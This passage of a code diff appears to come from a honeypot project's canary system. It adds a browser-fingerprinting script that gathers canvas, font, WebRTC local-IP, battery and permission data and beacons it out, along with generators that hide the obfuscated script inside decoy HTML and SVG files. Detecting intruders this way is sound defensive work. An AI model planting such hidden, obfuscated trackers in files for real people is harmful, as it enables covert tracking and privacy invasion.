+      "Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
+      "San Francisco", "Helvetica Neue", "Lucida Grande",
+      "DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
+      "Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
+      "Noto Sans", "Noto Mono",
+      "Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
+      "Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
+      "Malgun Gothic", "Noto Sans CJK",
+      "Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
+      "Bahnschrift", "Cyberpunk",
+    ];
+    var sp = document.createElement("span");
+    sp.style.fontSize = "72px";
+    sp.style.position = "absolute";
+    sp.style.left = "-9999px";
+    sp.innerHTML = "mmmmmmmmmmlli";
+    document.body.appendChild(sp);
+    var bs = {};
+    for (var bi = 0; bi < bases.length; bi++) {
+      sp.style.fontFamily = bases[bi];
+      bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
+    }
+    var det = [];
+    for (var ti = 0; ti < tests.length; ti++) {
+      for (var bj = 0; bj < bases.length; bj++) {
+        sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
+        if (sp.offsetWidth !== bs[bases[bj]].w ||
+            sp.offsetHeight !== bs[bases[bj]].h) {
+          det.push(tests[ti]); break;
+        }
+      }
+    }
+    document.body.removeChild(sp);
+    fp.ft = {
+      h: await sha256(det.slice().sort().join(",")),
+      n: det.length, t: tests.length, d: det,
+    };
+  } catch (e) { fp.ft = { err: String(e) }; }
+
+  // webrtc local ip leak
+  try {
+    var ips = {}; var cands = [];
+    var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
+              window.mozRTCPeerConnection;
+    if (RPC) {
+      var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
+      pc.createDataChannel("");
+      pc.onicecandidate = function (e) {
+        if (!e.candidate) return;
+        cands.push(e.candidate.candidate);
+        var m = e.candidate.candidate.match(
+          /(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
+        if (m) ips[m[1]] = 1;
+      };
+      var off = await pc.createOffer();
+      await pc.setLocalDescription(off);
+      await new Promise(function (r) { setTimeout(r, 1500); });
+      pc.close();
+      fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
+    } else { fp.rtc = { err: "unavailable" }; }
+  } catch (e) { fp.rtc = { err: String(e) }; }
+
+  // battery
+  try {
+    if (navigator.getBattery) {
+      var bat = await navigator.getBattery();
+      fp.bt = {
+        c: bat.charging, l: bat.level,
+        ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
+        dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
+      };
+    } else { fp.bt = { err: "unavailable" }; }
+  } catch (e) { fp.bt = { err: String(e) }; }
+
+  // perf timing jitter
+  try {
+    var samples = [];
+    for (var pi = 0; pi < 1000; pi++) {
+      var pa = performance.now();
+      var x = 0;
+      for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
+      samples.push(performance.now() - pa);
+    }
+    samples.sort(function (a, b) { return a - b; });
+    fp.pf = {
+      med: samples[500].toFixed(4),
+      p95: samples[950].toFixed(4),
+      mn: samples[0].toFixed(4),
+      mx: samples[999].toFixed(4),
+    };
+  } catch (e) { fp.pf = { err: String(e) }; }
+
+  // permissions
+  try {
+    if (navigator.permissions) {
+      var names = ["geolocation", "notifications", "camera", "microphone",
+                   "persistent-storage", "clipboard-read", "clipboard-write"];
+      var st = {};
+      for (var ni = 0; ni < names.length; ni++) {
+        try {
+          var r = await navigator.permissions.query({ name: names[ni] });
+          st[names[ni]] = r.state;
+        } catch (e) { st[names[ni]] = "unsupported"; }
+      }
+      fp.pm = st;
+    } else { fp.pm = { err: "unavailable" }; }
+  } catch (e) { fp.pm = { err: String(e) }; }
+
+  // composite identity hash — stable inputs only
+  try {
+    var stable = [
+      fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
+      fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
+      fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
+      fp.scr && (fp.scr.w + "x" + fp.scr.h),
+    ].filter(Boolean).join("|");
+    fp.id = await sha256(stable);
+  } catch (e) { fp.id = { err: String(e) }; }
+
+  // 2) ship the payload as base64url JSON on a GET query param.
+  //    The current worker records the hit on /c/<slug>; step-4 worker
+  //    will decode ?d= and persist the fingerprint blob.
+  try {
+    var json = JSON.stringify(fp);
+    var b64 = btoa(unescape(encodeURIComponent(json)))
+      .replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
+    // chunk if URL would exceed safe limit (~6KB)
+    var MAX = 6000;
+    if (b64.length <= MAX) {
+      fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
+    } else {
+      var sid = (Math.random() * 1e9 | 0).toString(36);
+      var total = Math.ceil(b64.length / MAX);
+      for (var ci = 0; ci < total; ci++) {
+        var part = b64.substr(ci * MAX, MAX);
+        fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
+      }
+    }
+  } catch (e) { /* swallow */ }
+})();
--- a/decnet/canary/generators/fingerprint_html.py
+++ b/decnet/canary/generators/fingerprint_html.py
@@ -0,0 +1,140 @@
+"""HTML fingerprint canary — plausible-looking page with an obfuscated
+browser-fingerprinting payload inlined at the bottom of ``<body>``.
+
+The visible content is a deliberately mundane "internal directory"
+table — the kind of file a curious attacker pulls off a decky's
+filesystem and opens locally to triage.  When the file is opened in
+*any* network-connected browser the obfuscated payload runs and beacons
+to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
+fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
+timing jitter, permissions, composite identity hash).
+
+Determinism: the mint UUID is derived from the callback token via
+:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
+output, satisfying the generator contract in :mod:`decnet.canary.base`.
+The obfuscator's seed and polymorphic config bits are likewise
+callback-token-derived (see :mod:`decnet.canary.obfuscator`).
+"""
+from __future__ import annotations
+
+import hashlib
+import uuid
+
+from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
+from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
+
+_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
+
+
+def _mint_uuid_for(callback_token: str) -> str:
+    return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
+
+
+def _stable_int(callback_token: str, salt: str = "") -> int:
+    """Deterministic non-negative int derived from the callback token.
+
+    ``builtins.hash`` is salted per-process — useless for a generator
+    that must be byte-identical across runs.  SHA-256 prefix is
+    overkill but free.
+    """
+    h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
+    return int.from_bytes(h[:4], "big")
+
+
+_PAGE_TEMPLATE = """<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="utf-8">
+<title>Internal Asset Directory</title>
+<style>
+body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
+margin:24px;font-size:13px}}
+h1{{font-size:18px;margin:0 0 4px 0}}
+.sub{{color:#777;font-size:11px;margin-bottom:18px}}
+table{{border-collapse:collapse;width:100%;background:#fff;
+box-shadow:0 1px 2px rgba(0,0,0,.05)}}
+th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
+th{{background:#f4f4f4;font-weight:600;font-size:11px;
+text-transform:uppercase;letter-spacing:.5px;color:#555}}
+tr:hover td{{background:#fafbff}}
+.foot{{margin-top:16px;color:#999;font-size:11px}}
+</style>
+</head>
+<body>
+<h1>Internal Asset Directory</h1>
+<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
+<table>
+<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
+{rows}
+</table>
+<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
+<script>{payload}</script>
+</body>
+</html>
+"""
+
+
+_ROW_POOL = (
+    ("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
+    ("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
+    ("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
+    ("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
+    ("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
+    ("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
+    ("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
+    ("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
+    ("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
+)
+
+
+def _build_rows(callback_token: str) -> tuple[str, int]:
+    pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
+    take = 5 + (_stable_int(callback_token, "take") % 4)
+    selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
+    cells = "\n".join(
+        "<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
+        for row in selected
+    )
+    return cells, len(selected)
+
+
+def _sync_label(callback_token: str) -> str:
+    day = _stable_int(callback_token, "day") % 28 + 1
+    hour = _stable_int(callback_token, "hour") % 24
+    return f"2026-04-{day:02d} {hour:02d}:14 UTC"
+
+
+class FingerprintHtmlGenerator(CanaryGenerator):
+    """Synthesise an HTML page that fingerprints the browser opening it."""
+
+    name = "fingerprint_html"
+
+    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
+        mint_uuid = _mint_uuid_for(ctx.callback_token)
+        nonce = nonce_for(ctx.callback_token, mint_uuid)
+        payload = render_fingerprint_js(
+            callback_token=ctx.callback_token,
+            http_base=ctx.http_base,
+            mint_uuid=mint_uuid,
+            nonce=nonce,
+        )
+        rows, row_count = _build_rows(ctx.callback_token)
+        body = _PAGE_TEMPLATE.format(
+            sync_label=_sync_label(ctx.callback_token),
+            row_count=row_count,
+            rows=rows,
+            payload=payload,
+        )
+        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
+        return CanaryArtifact(
+            path="",
+            content=body.encode("utf-8"),
+            mode=0o644,
+            mtime_offset=-86400 * 14,
+            generator=self.name,
+            fingerprint_nonce=nonce,
+            notes=[
+                f"obfuscated fingerprinter beacons={beacon}",
+                f"mint_uuid={mint_uuid}",
+            ],
+        )
--- a/decnet/canary/generators/fingerprint_svg.py
+++ b/decnet/canary/generators/fingerprint_svg.py
@@ -0,0 +1,88 @@
+"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
+that runs the obfuscated fingerprinter when the file is opened directly
+in a browser.
+
+SVG ``<script>`` only fires when the SVG is loaded as a top-level
+document (or via ``<object>``/``<iframe>``); it's *blocked* when the
+SVG is referenced from another page's ``<img>``.  That's the right
+posture for canary use: an attacker browsing the decky filesystem and
+double-clicking a stray ``network_diagram.svg`` triggers it; rendering
+inside a sandboxed CMS preview does not.
+
+Same determinism guarantees as :mod:`fingerprint_html`.
+"""
+from __future__ import annotations
+
+from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
+from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
+from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
+
+
+_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
+<style>
+.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
+.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
+.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
+.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
+.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
+</style>
+<text class="title" x="20" y="28">Network Topology — {region} segment</text>
+<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
+<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
+<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
+<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
+<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
+<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
+<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
+<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
+<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
+<path class="edge" d="M160 105 L240 105"/>
+<path class="edge" d="M360 105 L440 105"/>
+<path class="edge" d="M300 130 L300 220"/>
+<script type="application/ecmascript"><![CDATA[
+{payload}
+]]></script>
+</svg>
+"""
+
+
+_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
+
+
+class FingerprintSvgGenerator(CanaryGenerator):
+    """Synthesise an SVG that fingerprints the browser opening it."""
+
+    name = "fingerprint_svg"
+
+    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
+        mint_uuid = _mint_uuid_for(ctx.callback_token)
+        nonce = nonce_for(ctx.callback_token, mint_uuid)
+        payload = render_fingerprint_js(
+            callback_token=ctx.callback_token,
+            http_base=ctx.http_base,
+            mint_uuid=mint_uuid,
+            nonce=nonce,
+        )
+        region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
+        ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
+        day = _stable_int(ctx.callback_token, "day") % 28 + 1
+        body = _DIAGRAM_TEMPLATE.format(
+            region=region,
+            ver=ver,
+            review=f"2026-03-{day:02d}",
+            payload=payload,
+        )
+        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
+        return CanaryArtifact(
+            path="",
+            content=body.encode("utf-8"),
+            mode=0o644,
+            mtime_offset=-86400 * 30,
+            generator=self.name,
+            fingerprint_nonce=nonce,
+            notes=[
+                f"obfuscated fingerprinter beacons={beacon}",
+                f"mint_uuid={mint_uuid}",
+            ],
+        )
--- a/decnet/canary/generators/honeydoc_pdf.py
+++ b/decnet/canary/generators/honeydoc_pdf.py
@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        try:
-            from pikepdf import Pdf, Name, Dictionary, String  # type: ignore[import-not-found]
+            from pikepdf import Pdf, Name, Dictionary, String
        except ImportError as e:
            raise InstrumenterRejectedError(
                "honeydoc_pdf requires pikepdf; install it (`pip install "
--- a/decnet/canary/instrumenters/image.py
+++ b/decnet/canary/instrumenters/image.py
@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        try:
-            from PIL import Image, PngImagePlugin  # type: ignore[import-not-found]
+            from PIL import Image, PngImagePlugin
        except ImportError as e:
            raise InstrumenterRejectedError(
                "image instrumenter requires Pillow; install it (`pip "
--- a/decnet/canary/instrumenters/pdf.py
+++ b/decnet/canary/instrumenters/pdf.py
@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        try:
-            import pikepdf  # type: ignore[import-not-found]
+            import pikepdf
        except ImportError as e:
            raise InstrumenterRejectedError(
                "PDF instrumenter requires pikepdf; install it (`pip "
--- a/decnet/canary/obfuscator.py
+++ b/decnet/canary/obfuscator.py
@@ -0,0 +1,177 @@
+"""Per-mint JS obfuscator wrapper.
+
+Thin Python wrapper around the ``javascript-obfuscator`` Node package.
+Used by the fingerprint generators / instrumenters to produce a unique,
+hard-to-statically-analyse JS blob per canary mint.
+
+Two design choices flow from the canary contract in :mod:`base`:
+
+* **Determinism.** Generators must return byte-identical artifacts for
+  the same ``(callback_token, http_base, dns_zone, persona)``.  We
+  derive a numeric seed from the callback token and pass it to the
+  obfuscator's own ``seed`` option, and we derive the polymorphic
+  config bits from the same hash so a re-mint reproduces exactly.
+* **Per-mint uniqueness.** Two different callback tokens produce
+  structurally different output: different identifier names, different
+  string-array rotation, optionally different transforms enabled.
+
+The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
+We pass code+options as JSON on stdin and read the obfuscated result
+from stdout.  Stderr surfaces obfuscator failures.
+"""
+from __future__ import annotations
+
+import hashlib
+import hmac
+import json
+import os
+import subprocess  # nosec B404 — Node helper exec is the whole point
+from pathlib import Path
+from typing import Any
+
+_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
+_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
+
+# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
+# specific runtime; default to PATH lookup.
+_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
+
+# Hard timeout for the obfuscator subprocess. Real runs on the
+# fingerprint payload sit well under 5s on a dev box.
+_TIMEOUT_S = 30
+
+
+class ObfuscatorError(RuntimeError):
+    """Raised when the Node helper fails or returns empty output."""
+
+
+class FingerprintSecretMissing(RuntimeError):
+    """Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
+
+    Fingerprint canaries embed a per-mint nonce derived from this
+    server-side secret; without it the worker cannot validate incoming
+    fingerprint beacons, so we fail loud at mint time rather than ship
+    a defeatable canary.
+    """
+
+
+_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET"  # nosec B105 — this is an env var name, not a hardcoded password
+
+
+def nonce_for(callback_token: str, mint_uuid: str) -> str:
+    """Compute the per-mint fingerprint nonce.
+
+    HMAC-SHA256 keyed on the server-side master secret, message is
+    ``callback_token + "|" + mint_uuid``.  Truncated to 16 hex chars
+    (~64 bits of entropy) — enough to defeat slug-only forgery while
+    fitting comfortably into a query string.
+    """
+    secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
+    if not secret:
+        raise FingerprintSecretMissing(
+            f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
+        )
+    msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
+    return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
+
+
+def _seed_from_token(callback_token: str) -> int:
+    """Derive a 31-bit numeric seed from the callback token.
+
+    ``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
+    using a SHA-256-derived prefix gives us a uniform distribution
+    across the 31-bit positive range.
+    """
+    h = hashlib.sha256(callback_token.encode("utf-8")).digest()
+    return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
+
+
+def _config_from_seed(seed: int) -> dict[str, Any]:
+    """Build a deterministic, per-mint obfuscator config.
+
+    The hash bits drive *which* transforms apply — two mints get
+    structurally different outputs, not just different identifier names.
+    Defaults stay aggressive enough that reverse engineering is real
+    work; we never disable string-array or rename, only vary the dial.
+    """
+    bits = seed
+    encodings = ("base64", "rc4")
+    string_array_encoding = [encodings[bits & 1]]
+    control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0  # 0.5 .. ~1.0
+    dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0  # 0.2 .. ~0.7
+    transform_object_keys = bool((bits >> 17) & 1)
+    numbers_to_expressions = bool((bits >> 18) & 1)
+    simplify = bool((bits >> 19) & 1)
+    return {
+        "compact": True,
+        "seed": seed,
+        "controlFlowFlattening": True,
+        "controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
+        "deadCodeInjection": True,
+        "deadCodeInjectionThreshold": round(dead_code_threshold, 3),
+        "stringArray": True,
+        "stringArrayEncoding": string_array_encoding,
+        "stringArrayThreshold": 1,
+        "stringArrayRotate": True,
+        "stringArrayShuffle": True,
+        "splitStrings": True,
+        "splitStringsChunkLength": 4 + (bits & 7),
+        "transformObjectKeys": transform_object_keys,
+        "numbersToExpressions": numbers_to_expressions,
+        "simplify": simplify,
+        "selfDefending": False,  # breaks SVG embed; not worth the cost
+        "renameGlobals": False,
+        "identifierNamesGenerator": "mangled-shuffled",
+    }
+
+
+def obfuscate(code: str, *, callback_token: str) -> str:
+    """Obfuscate *code* deterministically per *callback_token*.
+
+    Raises :class:`ObfuscatorError` if Node fails or returns empty.
+    """
+    seed = _seed_from_token(callback_token)
+    options = _config_from_seed(seed)
+    payload = json.dumps({"code": code, "options": options})
+    try:
+        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
+            [_NODE_BIN, str(_HELPER)],
+            input=payload, capture_output=True, text=True,
+            timeout=_TIMEOUT_S, check=False,
+        )
+    except FileNotFoundError as e:
+        raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
+    except subprocess.TimeoutExpired as e:
+        raise ObfuscatorError("javascript-obfuscator timed out") from e
+    if proc.returncode != 0:
+        raise ObfuscatorError(
+            f"javascript-obfuscator failed rc={proc.returncode} "
+            f"stderr={proc.stderr.strip()[:400]}"
+        )
+    out = proc.stdout
+    if not out.strip():
+        raise ObfuscatorError("javascript-obfuscator returned empty output")
+    return out
+
+
+def render_fingerprint_js(
+    *, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
+) -> str:
+    """Build the obfuscated fingerprint JS for a single mint.
+
+    Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
+    ``{{MINT_NONCE}}`` in the payload template, then runs it through
+    :func:`obfuscate` with a seed derived from the callback token.
+    The nonce is appended as ``&k=`` on every beacon URL the JS emits;
+    the worker rejects fingerprint payloads whose ``?k=`` doesn't match
+    the row's :attr:`CanaryToken.fingerprint_nonce`.
+    """
+    template = _PAYLOAD.read_text(encoding="utf-8")
+    beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
+    src = (
+        template
+        .replace("{{BEACON_URL}}", beacon)
+        .replace("{{MINT_UUID}}", mint_uuid)
+        .replace("{{MINT_NONCE}}", nonce)
+    )
+    return obfuscate(src, callback_token=callback_token)
--- a/decnet/canary/package.json
+++ b/decnet/canary/package.json
@@ -0,0 +1,10 @@
+{
+  "name": "decnet-canary-obfuscator",
+  "version": "0.1.0",
+  "private": true,
+  "description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
+  "main": "_obfuscate_helper.js",
+  "dependencies": {
+    "javascript-obfuscator": "^5.4.2"
+  }
+}
--- a/decnet/canary/paths.py
+++ b/decnet/canary/paths.py
@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
    "honeydoc": "/home/{user}/Documents/quarterly_report.html",
    "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
    "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
+    "fingerprint_html": "/home/{user}/Documents/asset_directory.html",
+    "fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
 }

 _WINDOWS_DEFAULTS: dict[str, str] = {
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
    "honeydoc": "/home/{user}/Documents/quarterly_report.html",
    "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
    "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
+    "fingerprint_html": "/home/{user}/Documents/asset_directory.html",
+    "fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
 }


--- a/decnet/canary/planter.py
+++ b/decnet/canary/planter.py
@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
 """
 from __future__ import annotations

-import asyncio
-import base64
 import os
-import shlex
-import time
+from datetime import datetime, timedelta, timezone
 from secrets import token_urlsafe
 from typing import Any, Iterable, Optional

@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
 from decnet.canary.base import CanaryArtifact, CanaryContext
 from decnet.canary.factory import get_generator
 from decnet.canary.paths import default_path_for
+from decnet.decky_io import (
+    delete_file_from_container,
+    resolve_topology_container,
+    write_file_to_container,
+)
 from decnet.logging import get_logger
 from decnet.web.db.repository import BaseRepository

 log = get_logger("canary.planter")

-_DOCKER = "docker"
-_TIMEOUT = 8.0
 # Container suffix — matches the orchestrator SSH driver's convention
 # (``<decky_name>-ssh``).  Canary placement always happens through the
 # ssh container because every decky has one and it carries the most
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
    return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"


-def _dirname(path: str) -> str:
-    idx = path.rfind("/")
-    if idx <= 0:
-        return "/"
-    return path[:idx]
-
-
-async def _run(
-    argv: list[str], *, stdin_bytes: Optional[bytes] = None,
-) -> tuple[int, str, str]:
-    try:
-        proc = await asyncio.create_subprocess_exec(
-            *argv,
-            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
-            stdout=asyncio.subprocess.PIPE,
-            stderr=asyncio.subprocess.PIPE,
-        )
-    except FileNotFoundError as exc:
-        return 127, "", f"argv[0] not found: {exc}"
-    try:
-        stdout, stderr = await asyncio.wait_for(
-            proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
-        )
-    except asyncio.TimeoutError:
-        try:
-            proc.kill()
-        except ProcessLookupError:
-            pass
-        return 124, "", "timeout"
-    return (
-        proc.returncode if proc.returncode is not None else -1,
-        stdout.decode("utf-8", "replace"),
-        stderr.decode("utf-8", "replace"),
-    )
-
-
-def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
-    """Compose the ``sh -c`` script + stdin payload for one artifact.
-
-    Binary safety: we base64-encode on the host and stream the result
-    over stdin to ``base64 -d`` inside the container, so the bytes
-    never touch the argv (kernel ARG_MAX would reject anything larger
-    than ~128KB-2MB depending on the host).  Both ``base64`` (coreutils)
-    and ``touch -d @<unix_ts>`` are present on every Linux base image
-    we ship, so there's no per-distro branching.
-    """
-    encoded = base64.b64encode(artifact.content)
-    mtime = int(time.time() + artifact.mtime_offset)
-    mode_str = oct(artifact.mode)[2:]
-    parts = [
-        f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
-        f"base64 -d > {shlex.quote(artifact.path)}",
-        f"chmod {mode_str} {shlex.quote(artifact.path)}",
-        f"touch -d @{mtime} {shlex.quote(artifact.path)}",
-    ]
-    return " && ".join(parts), encoded
+# resolve_topology_container is re-exported from decky_io for back-compat
+# with callers (tests, deploy hook) that imported it from this module
+# before the decky_io extraction.
+__all__ = [
+    "plant",
+    "revoke",
+    "resolve_topology_container",
+    "seed_baseline",
+    "seed_baseline_topology",
+]


 async def _publish(
@@ -139,6 +93,7 @@ async def plant(
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
+    container: Optional[str] = None,
 ) -> tuple[bool, Optional[str]]:
    """Write *artifact* into the decky's ssh container.

@@ -157,13 +112,12 @@ async def plant(
            await repo.update_canary_token_state(token_uuid, "failed", err)
        return False, err

-    sh_cmd, stdin_payload = _build_plant_command(artifact)
-    # ``-i`` keeps stdin attached so base64 -d inside the container can
-    # consume the encoded payload streamed from the host.
-    argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
-    rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
-    success = rc == 0
-    error = None if success else (stderr.strip()[:256] or f"rc={rc}")
+    target_container = container or _container_for(decky_name)
+    mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
+    success, error = await write_file_to_container(
+        target_container, artifact.path, artifact.content,
+        mode=artifact.mode, mtime=mtime,
+    )

    if repo is not None:
        if success:
@@ -182,8 +136,8 @@ async def plant(

    if not success:
        log.warning(
-            "canary.plant failed decky=%s token=%s rc=%d stderr=%r",
-            decky_name, token_uuid, rc, stderr[:120],
+            "canary.plant failed decky=%s token=%s container=%s err=%r",
+            decky_name, token_uuid, target_container, error,
        )
    return success, error

@@ -196,6 +150,7 @@ async def revoke(
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
+    container: Optional[str] = None,
 ) -> tuple[bool, Optional[str]]:
    """Best-effort unlink + state transition + bus publish.

@@ -203,11 +158,10 @@ async def revoke(
    the file is gone after the call (whether we deleted it or it was
    already missing); only docker / container-down errors return False.
    """
-    sh_cmd = f"rm -f {shlex.quote(placement_path)}"
-    argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
-    rc, _stdout, stderr = await _run(argv)
-    success = rc == 0
-    error = None if success else (stderr.strip()[:256] or f"rc={rc}")
+    target_container = container or _container_for(decky_name)
+    success, error = await delete_file_from_container(
+        target_container, placement_path,
+    )

    if repo is not None:
        await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
@@ -250,6 +204,7 @@ async def seed_baseline(
    persona: str = "linux",
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
+    container: Optional[str] = None,
 ) -> list[dict[str, Any]]:
    """Plant the configured baseline canary set on one decky.

@@ -293,9 +248,59 @@ async def seed_baseline(
        await plant(
            decky_name, artifact,
            token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
+            container=container,
        )
        out.append({
            "token_uuid": token_uuid, "generator": gen_name, "kind": kind,
            "callback_token": slug, "placement_path": artifact.path,
        })
    return out
+
+
+async def seed_baseline_topology(
+    repo: BaseRepository,
+    topology_id: str,
+    *,
+    created_by: str = "system",
+    bus: Optional[BaseBus] = None,
+) -> list[dict[str, Any]]:
+    """Plant baseline canaries on every decky in a MazeNET topology.
+
+    Mirrors :func:`seed_baseline` for the topology path. Container name
+    resolution uses :func:`resolve_topology_container` since topology
+    deckies may not have an ssh service — in that case we target the
+    base container instead.
+
+    Best-effort: failures on any single decky are logged inside
+    :func:`plant`; the deploy hook treats the return value as
